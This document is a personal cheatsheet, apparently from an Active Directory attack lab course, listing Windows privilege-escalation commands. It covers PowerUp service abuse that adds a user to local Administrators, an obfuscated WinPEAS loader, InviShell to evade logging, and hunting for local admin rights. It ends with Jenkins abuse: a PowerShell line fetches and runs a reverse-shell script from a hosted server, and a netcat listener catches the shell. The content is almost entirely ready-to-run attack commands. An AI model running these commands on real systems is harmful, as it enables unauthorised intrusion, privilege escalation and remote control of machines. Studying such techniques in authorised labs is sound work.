🏁Cheatsheet - Fast Commands (PRIVILEGE ESCALATION)

Enumeration - Local Privilege Escalation

View you current privileges in the domain

whoami /all
## grupos, privilegios, SID, permisos especiales
net user %username% /domain
## Domain Admin, RDP Users, Backup Operators, etc
net localgroup administrators
## Search about local admin privileges

---

With PowerUP

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerUp.ps1

Invoke-AllChecks

---

Abuse of Invoke-ServiceAbuse

Let's use the abuse function for Invoke-ServiceAbuse and add our current domain user to the local Administrators group.

Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student113' -Verbose

We can see that the dcorp\studentx is a local administrator now. Just logoff and logon again and we have local administrator privileges!

---

Local Privilege Escalation - WinPEAS

You can use WinPEAS using the following command. Note that we use an obfuscated version of WinPEAS:

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\winPEASx64.exe -args notcolor log

---

Local Privilege Escalation - PrivEscCheck

Similarly, we can use PrivEscCheck (https://github.com/itm4n/PrivescCheck) for a nice summary of possible privilege escalation opportunities:

. C:\AD\Tools\PrivEscCheck.ps1

Invoke-PrivescCheck

---

User Hunt for Local Admin access

Identify a machine in the domain where studentx has local administrative access, use Find-PSRemotingLocalAdminAccess.ps1:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess

It equal to = in whats domain machines are i admin local?

Studentx has administrative access on the pc: dcorp-adminsrv and on the student machine

Connect by other Domain Machines how Local Admin

winrs -r:dcorp-adminsrv cmd

set username
set computername

---

PowerShell Remoting

Note: Remenber use a new invishell

Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
## After
$env:username

---

Abuse Jenkins Instance

If we get a jenkins intance/login, try to login with username:usernarme pass

Once you are in it, modificate/create a new proyect and insert the revershell command -->

powershell.exe iex (iwr http://172.16.100.113/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.113 -Port 443

Double check the following:

1. Remember to host the reverse shell on a local web server on your student VM. You can find hfs.exe in the C:\AD\Tools directory of your student VM. Note that HFS goes in the system tray when minimized. You may like to click the up arrow on the right side of the taskbar to open the system tray and double-click on the HFS icon to open it again.

2. Also, make sure to add an exception or turn off the firewall on the student VM.

3. Check if there is any typo or extra space in the Windows Batch command that you used above in the Jenkins project.

4. After you build the project below, check the 'Console Output' of the Jenkins Project to know more about the error.

Share a folder with Invoke-PowerShellTcp

Fristly, execute HFS to enable the share -->

After, upload the Invoke-PowerShellTcp.ps1 -->

Note: There is the route to copy and paste in the command:

powershell.exe iex (iwr http://172.16.100.113/Invoke-PowerShellTcp.ps1 -UseBasicParsing); ...

Once we have the payload and share run, remember to host turn off the Windows Firewall

Once all it's done, weak up the NetCat and run the build -->

C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443

Note: I dont need disable anything. If you have issues, reboot the machine

We can now run commands on the reverse shell:

$env:username

ipconfig

$env:computername